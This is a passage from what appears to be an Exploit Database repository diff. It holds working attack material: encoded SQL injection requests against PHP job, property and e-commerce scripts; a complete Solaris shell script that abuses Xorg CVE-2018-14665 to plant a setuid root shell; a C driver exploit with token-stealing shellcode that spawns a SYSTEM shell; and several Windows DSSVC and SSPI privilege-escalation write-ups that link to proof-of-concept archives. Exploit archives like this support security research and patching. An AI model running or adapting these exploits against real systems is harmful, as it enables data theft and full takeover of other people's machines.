# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?route=property/property_detail&property_id=[SQL]
#
GET /[PATH]/index.php?route=property/property_detail&property_id=15912%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c; default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb; currency=USD; __zlcmid=qMhwOYHc5w0Pnj
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 11:20:04 GMT
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: default=78b0c7c7490c09d10765fb78b61bd9a3; path=/; httponly
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/index.php?route=property/category&filter_area=[SQL]
#
GET /[PATH]/index.php?route=property/category&filter_area=1;265112%27||(%53%65%6c%65%43%54%20%27Efe%27%20FroM%20duAL%20WheRE%20%31%31%30%3d%31%31%30%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(%53%65%4c%45%63%74%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20grOUp%20BY%20x)a))||%27%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c; default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb; currency=USD; __zlcmid=qMhwOYHc5w0Pnj
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 11:23:45 GMT
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: default=78b0c7c7490c09d10765fb78b61bd9a3; path=/; httponly
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/index.php?route=property/category%20&filter_range=[SQL]
#
GET /[PATH]/index.php?route=property/category%20&filter_range=1;8200012%27||(%53%65%6c%65%43%54%20%27Efe%27%20FroM%20duAL%20WheRE%20%31%31%30%3d%31%31%30%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(%53%65%4c%45%63%74%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20grOUp%20BY%20x)a))||%27%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c; default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb; currency=USD; __zlcmid=qMhwOYHc5w0Pnj
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 11:24:49 GMT
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: default=78b0c7c7490c09d10765fb78b61bd9a3; path=/; httponly
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

66
exploits/php/webapps/46152.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: Job Portal 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ocsolutions.co.in/
# Software Link: https://codecanyon.net/item/job-portal-platform-a-complete-job-portal-website/21916934
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?route=job/jobdetail&job_id=[SQL]
#
POST /[PATH]/index.php?route=job/jobdetail&job_id=%2d%39%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d+%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%32%31%2c%32%32%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c; default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb; currency=USD; __zlcmid=qMhwOYHc5w0Pnj
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 14:08:17 GMT
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: default=78b0c7c7490c09d10765fb78b61bd9a3; path=/; httponly
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
# POC:
# 2)
# http://localhost/[PATH]/index.php?route=tmdblog/blog&blog_id=[SQL]
#
GET /[PATH]/index.php?route=tmdblog/blog&blog_id=14%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45(22,%25%34%33%25%34%66%25%34%65%25%34%33%25%34%31%25%35%34%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c; default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb; currency=USD; __zlcmid=qMhwOYHc5w0Pnj
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 11:11:45 GMT
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: default=78b0c7c7490c09d10765fb78b61bd9a3; path=/; httponly
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

35
exploits/php/webapps/46154.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ocsolutions.co.in/
# Software Link: https://codecanyon.net/item/marketplace-builder-a-complete-ecommerce-multivendor-solution-with-cms/21808220
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?route=product/category&path=[SQL]
#
GET /[PATH]/index.php?route=product/category&path=%33%33%5f%36%34%31%34%39%39%39%39%39%27%20%2f%2a%21%31%33%33%33%37%50%72%6f%63%65%44%75%72%65%2a%2f%20%41%6e%41%6c%79%73%65%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%63%6f%6e%63%61%74%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: OCSESSID=19eef2415d8afbee8c2f353629; language=en-gb; currency=USD
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 14 Jan 2019 18:17:53 GMT
Server: Apache
X-Powered-By: PHP/5.6.39
Set-Cookie: OCSESSID=19eef2415d8afbee8c2f353629; path=/
Set-Cookie: OCSESSID=19eef2415d8afbee8c2f353629; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

78
exploits/solaris/local/46142.sh Executable file
View file

@ -0,0 +1,78 @@
#!/bin/sh
# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)
# Date: 2018-11-25
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: Oracle Solaris 11.4
# CVE : CVE-2018-14665
#
# raptor_solgasm - xorg-x11-server LPE via Solaris inittab
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# "In video games, this is what they call respawning" -- Nick Sax
#
# This exploit targets /etc/inittab in order to escalate privileges to root
# on Solaris 11 (no need to be connected to a physical console). Messing with
# inittab is considerably dangerous and you may trash your system, however the
# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't
# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_solgasm
# raptor@stalker:~$ ./raptor_solgasm
# [...]
# Now please be patient for a few minutes...
# [...]
# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab
# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab
# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old
# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned
# root@stalker:/etc# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
#
echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
# prepare the payload
cat << EOF > /tmp/solgasm
cp /bin/zsh /tmp/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /tmp/pwned
chmod 4777 /tmp/pwned
EOF
chmod +x /tmp/solgasm
# trigger the bug
PWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)
cd /etc
Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 &
sleep 5
pkill Xorg
# run the setuid shell
echo
echo "Now please be patient for a few minutes..."
echo
until [ -u /tmp/pwned ]; do sleep 1; done
echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab"
ls -l /etc/inittab*
ls -l /tmp/pwned
sleep 1
/tmp/pwned

158
exploits/windows/local/46155.c Normal file
View file

@ -0,0 +1,158 @@
/*
Exploit Title - Dokany Stack-based Buffer Overflow Privilege Escalation
Date - 14th January 2019
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://dokan-dev.github.io
Tested Version - 1.2.0.1000
Driver Version - 1.2.0.1000 - dokan1.sys
Software package - https://github.com/dokan-dev/dokany/releases/download/v1.2.0.1000/DokanSetupDbg_redist.exe
Tested on OS - 32bit Windows 7
CVE ID - CVE-2018-5410
Vendor fix url - https://github.com/dokan-dev/dokany/releases/tag/v1.2.1.1000
CERT/CC Vul note - https://www.kb.cert.org/vuls/id/741315
Fixed Version - 1.2.1.1000
Fixed driver ver - 1.2.1.1000
Check blogpost for details:
https://www.greyhathacker.net/?p=1041
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 896
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_w7[] =
{
0x60, // pushad Saves all registers
0x64,0xA1,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax Current _EPROCESS structure
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x89,0x91,0xF8,0x00,0x00,0x00, // mov [ecx+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x61, // popad Restores all registers
0x81,0xc4,0x3c,0x0b,0x00,0x00, // add esp,0xB3c Target frame to return
0x31,0xc0, // xor eax,eax NTSTATUS -> STATUS_SUCCESS
0x5d, // pop ebp Restore saved EBP
0xc2,0x08,0x00 // ret 8 Return cleanly
};
int spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
if (!CreateProcess(NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return -1;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE *inbuffer;
LPVOID addrtoshell;
printf("-------------------------------------------------------------------------------\n");
printf(" Dokany (dokan1.sys) Stack-based Buffer Overflow Cookie Bypass EoP Exploit \n");
printf(" Tested on 32bit Windows 7 \n");
printf("-------------------------------------------------------------------------------\n");
addrtoshell = VirtualAlloc(NULL, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("\n[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
printf("\n[i] Size of shellcode %d bytes", sizeof(token_steal_w7));
printf("\n[i] Shellcode located at address 0x%p", addrtoshell);
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if(inbuffer == NULL)
{
printf("\n[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
memset(inbuffer, 0x41, BUFSIZE);
printf("\n[i] Buffer located at address 0x%p", inbuffer);
printf("\n[i] Size of total input buffer being sent %d bytes", BUFSIZE);
*(WORD*)(inbuffer) = BUFSIZE; // Size of buffer used by memcpy
*(WORD*)(inbuffer + 2) = BUFSIZE-6; // Size of input buffer, value has to be at most BUFSIZE - 6
*(DWORD*)(inbuffer + 776) = 0x42424242; // cookie
*(DWORD*)(inbuffer + 784) = 0x43434343; // return
*(DWORD*)(inbuffer + 792) = 0x44444444; // IRP
// *(DWORD*)(inbuffer + 892) = 0x45454545; // Exception handler
*(DWORD*)(inbuffer + 892) = (ULONG)addrtoshell; // Shellcode
sprintf(devhandle, "\\\\.\\%s", "Dokan_1");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .\n");
getch();
DeviceIoControl(hDevice, 0x00222010, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("[*] Spawning SYSTEM Shell\n");
spawnShell();
CloseHandle(hDevice);
return 0;
}

31
exploits/windows/local/46156.txt Normal file
View file

@ -0,0 +1,31 @@
Windows: SSPI Network Authentication Session 0 EoP
Platform: Windows 10 1803/1809 (not tested earlier versions)
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): Session boundary
Summary: Performing an NTLM authentication to the same machine results in a network token which can be used to create arbitrary processes in session 0.
Description:
Typically performing a loopback authentication would result in a short circuited authentication NTLM challenge response which will just return to the caller a copy of the token which initiated the authentication request. This token has the same properties, such as elevation status, authentication ID and session ID as the caller and so isnt that interesting from an exploitation perspective.
However if you initiate the authentication process by supplying a SEC_WINNT_AUTH_IDENTITY_EX structure to AcquireCredentialsHandle which has the username and domain fields set, but not the password the authentication process will instead return an authenticated network token. This is interesting because LSASS doesnt modify the session ID of the token, which means the returned token is set to session ID 0 (network authentication doesnt spin up a new console session). If we do the authentication to ourselves well meet all the requirements to impersonate this token, its the same user and the same privilege level so we can then use this to spawn a new process running in session 0, where we could potentially elevate our privileges by modifying global named objects or making it easier to exploit case 47435.
Note that not specifying any buffer to pAuthData in AcquireCredentialsHandle or passing SEC_WINNT_AUTH_IDENTITY_EX but with empty username and domain fields results in the normal loopback authentication.
While Ive not verified this it might also work in an AppContainer if the Enterprise Authentication capability has been granted, which is allowed in some of the Edge sandbox profiles. The normal short circuit authentication would return the AC token but this approach might return the full token. With a full token you might be able to elevate privileges.
Proof of Concept:
Ive provided a PoC as a C# project. The PoC negotiates the network access token set to Session 0 then abuses the COM activator to create a process using that access token. While I dont control the process being created (outside of choosing a suitable COM class) it would be easy to do by modifying DOS devices to redirect the creation or just inject into the new process and execute arbitrary code.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Run the PoC, observe the text output.
Expected Result:
The negotiated token is just a reflected version of the current process token.
Observed Result:
The token is set for session 0 and a new process can be created with that session ID set.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46156.zip

37
exploits/windows/local/46157.txt Normal file
View file

@ -0,0 +1,37 @@
Windows: DSSVC DSOpenSharedFile Arbitrary File Open EoP
Platform: Windows 10 1803 and 1809.
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
NOTE: This is one of multiple issues Im reporting in the same service. While Ive tried to ensure all the bugs are effectively orthogonal from each other its possible that fixes for one thing might affect others. Ive also not reported every possible problem with the service as at some point I had to stop. Ive not determined if any of these issues could be abusable from a sandbox, most of the issues almost certainly cant be due to the requirements for arbitrary file symlinks but its not impossible.
Summary:
The Data Sharing Service doesnt handle file hard links in DSOpenSharedFile resulting in a user being able to open arbitrary files for full access at system privileges.
Description:
The Data Sharing Service allows you to setup a shared file, referenced by a GUID token by calling DSCreateSharedFileToken. The GUID token can then be passed back to DSOpenSharedFile to get a handle to the file. When the token is created the user passes a flag to indicate whether the file should be opened as Read and/or Write. This flag is then used during the call to CreateFile inside the service while running as the SYSTEM user.
In order to defend against the user replacing the file with a symlink the service checks that the opened file and the original path match by calling GetFinalPathNameByHandle. While the file will be opened as SYSTEM the user wont get back a handle to the file to allow them to manipulate it.
This breaks down with hard links, its possible for the user to setup a file to which they have full access and register the token. The file can then be deleted (as the service doesnt maintain any lock on the file) and replace it with a hard link to a file the user can only read. This is possible as while the CreateHardlink API requires FILE_WRITE_ATTRIBUTES access the underlying system call interface does not. Now when the file is opened through DSOpenSharedFile the hardlinked file will be open for write access, the handle is DSUtils::VerifyPathFromHandle which will find the path matches the expected one and then will duplicate the handle back to the caller. The caller can now modify this file to gain full privilege escalation.
Impersonating over the call to CreateFile would fix this issue, but that might make it impossible for the service to do its job of sharing the files if the use calling DSOpenSharedFile cant already open the file which was shared.
Proof of Concept:
Ive provided a PoC as a C# project. It will use a hardlink to open an arbitrary file for write access (as long as its accessible by the SYSTEM user).
1) Compile the C# project. Itll need to pull NtApiDotNet from NuGet to build.
2) Execute the PoC passing the path to a file the user cant write on the command line (but can be written by SYSTEM).
Expected Result:
Opening the file fails.
Observed Result:
The file is opened and a writable handle is returned to the user. The PoC will print out the granted access and the list of hard links to the file which should include the original filename.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46157.zip

36
exploits/windows/local/46158.txt Normal file
View file

@ -0,0 +1,36 @@
Windows: DSSVC DSOpenSharedFile Arbitrary File Delete EoP
Platform: Windows 10 1803 and 1809.
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
NOTE: This is one of multiple issues Im reporting in the same service. While Ive tried to ensure all the bugs are effectively orthogonal from each other its possible that fixes for one thing might affect others. Ive also not reported every possible problem with the service as at some point I had to stop. Ive not determined if any of these issues could be abusable from a sandbox, most of the issues almost certainly cant be due to the requirements for arbitrary file symlinks but its not impossible.
Summary:
The Data Sharing Service DSOpenSharedFile method takes a flag to delete a shared file on close which can be abused to delete an arbitrary file.
Description:
The DSOpenSharedFile method takes a flag parameter where the file handle can be opened overlapped or for delete on close. The delete on close flag will set the flag FILE_FLAG_DELETE_ON_CLOSE when opening the file with CreateFile. This code runs as SYSTEM so will open any file that that user has access to. However theres a couple of issues with this:
1) The code doesnt check that the file was shared writable, which means its possible to trivially specify a file to DSCreateSharedFileToken you want to delete and specify read only permissions. Then call DSOpenSharedFile with the delete on close flag, as the flag automatically adds the DELETE permission to the file open this will succeed even with the read-only mode set.
2) The DSOpenSharedFile relies on calling DSUtils::VerifyPathFromHandle prevent returning a handle which was redirected due to something like a symlink or directory junction. However by the time the code reaches the verification its already too late and the file will delete on close regardless of what the service now does.
While this bug relies on the same behavior as I reported for the arbitrary hardlink open issue (namely not impersonating the user when calling CreateFile) I think it should be treated separately, unless of course you decide to do the impersonation as a fix. At a minimum you should be checking that the file was shared writable in case 1, and perhaps you should open the file for DELETE in case 2, verify the path and only then delete the file by handle (using the native APIs).
Proof of Concept:
Ive provided a PoC as a C# project. It will delete an arbitrary file that the user can read by abusing case 1 above.
1) Compile the C# project. Itll need to pull NtApiDotNet from NuGet to build.
2) Execute the PoC passing the path to a file the user cant delete on the command line (but can be deleted by SYSTEM).
Expected Result:
The call to DSOpenSharedFile fails and the file isnt deleted.
Observed Result:
The file specified is deleted.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46158.zip

34
exploits/windows/local/46159.txt Normal file
View file

@ -0,0 +1,34 @@
Windows: DSSVC CanonicalAndValidateFilePath Security Feature Bypass
Platform: Windows 10 1803 and 1809.
Class: Security Feature Bypass/Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
NOTE: This is one of multiple issues Im reporting in the same service. While Ive tried to ensure all the bugs are effectively orthogonal from each other its possible that fixes for one thing might affect others. Ive also not reported every possible problem with the service as at some point I had to stop. Ive not determined if any of these issues could be abusable from a sandbox, most of the issues almost certainly cant be due to the requirements for arbitrary file symlinks but its not impossible.
Summary:
The Data Sharing Services check for the user passing UNC paths can be circumvented leading to a security feature bypass which can facilitate easier exploitation for privilege elevation.
Description:
During DSSCreateSharedFileTokenEx the path is passed to DSUtils::CanonicalAndValidateFilePath to canonicalize the path. This method also verifies that the passed path isnt a UNC path (for reasons unknown). The UNC path check can be bypassed by using the \??\UNC\ form. When this is passed to PathAllocCanonicalize it returns it verbatim, however this path format isnt considered a UNC path by PathIsUNCEx. However when passed to CreateFile etc it will be considered as if it was an \\?\UNC\ path format.
This could be useful for a few different attacks. For a start you could redirect the call to \\localhost\pipe\somepipe and get a named pipe handle bound to the SYSTEM user. Although Ive not worked out a way of getting the handle back (as GetFinalPathFromHandle fails). Another attack vector is when going to an SMB share any directory junctions are resolved on the server, this would allow you to bypass any checks such as DSUtils::VerifyPathFromHandle as the returned path would be \\?\UNC\localhost\c$\blah.. Regardless of the final destination path opened.
Proof of Concept:
Ive provided a PoC as a C# project.
1) Compile the C# project. Itll need to pull NtApiDotNet from NuGet to build.
2) Execute the poc, it will try and open c:\windows\notepad.exe via the C$ admin share.
Expected Result:
The path is considered invalid and DSSCreateSharedFileTokenEx fails.
Observed Result:
The UNC path is opened.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46159.zip

36
exploits/windows/local/46160.txt Normal file
View file

@ -0,0 +1,36 @@
Windows: DSSVC MoveFileInheritSecurity Multiple Issues EoP
Platform: Windows 10 1803 and 1809.
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
NOTE: This is one of multiple issues Im reporting in the same service. While Ive tried to ensure all the bugs are effectively orthogonal from each other its possible that fixes for one thing might affect others. Ive also not reported every possible problem with the service as at some point I had to stop. Ive not determined if any of these issues could be abusable from a sandbox, most of the issues almost certainly cant be due to the requirements for arbitrary file symlinks but its not impossible.
Summary:
